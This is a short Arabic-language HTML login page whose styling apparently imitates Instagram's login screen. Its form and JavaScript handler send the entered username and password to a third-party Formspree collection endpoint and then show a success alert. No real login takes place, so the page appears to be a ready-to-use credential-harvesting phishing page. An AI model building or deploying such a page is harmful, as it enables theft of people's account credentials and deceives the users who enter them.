<!DOCTYPE html>
<html lang="ar">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>تسجيل الدخول</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #fafafa;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }

.container {
      background-color: white;
      border-radius: 5px;
      box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
      padding: 20px;
      width: 300px;
    }

    h2 {
      text-align: center;
      color: #262626;
    }

input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #dbdbdb;
      border-radius: 5px;
    }

    button {
      width: 100%;
      padding: 10px;
      background-color: #0095f6;
      border: none;
      border-radius: 5px;
      color: white;
      font-size: 16px;
      cursor: pointer;
    }

    button:hover {
      background-color: #007bbd;
    }
</style>
</head>

<body>
  <div class="container">
    <h2>تسجيل الدخول</h2>
    <form id="loginForm" action="https://formspree.io/f/xzzbbwqz" method="POST">
      <input type="text" name="username" placeholder="اسم المستخدم" required>
      <input type="password" name="sinar" placeholder="sinar" required>
      <button type="submit">إرسال</button>
    </form>
  </div>
  <script>

 document.getElementById('loginForm').addEventListener('submit', function(event) {
      event.preventDefault();
      const formData = new FormData(this);
      fetch(this.action, {
        method: 'POST',
        body: formData,
        headers: {
          'Accept': 'application/json'
        }
      }).then(response => {
        if (response.ok) {
          alert('تم إرسال المعلومات بنجاح!');
          this.reset();
        } else {
          alert('حدث خطأ أثناء إرسال المعلومات.');
        }
      }).catch(error => {
        alert('حدث خطأ: ' + error.message);
      });
    });
  </script>
</body>

</html>
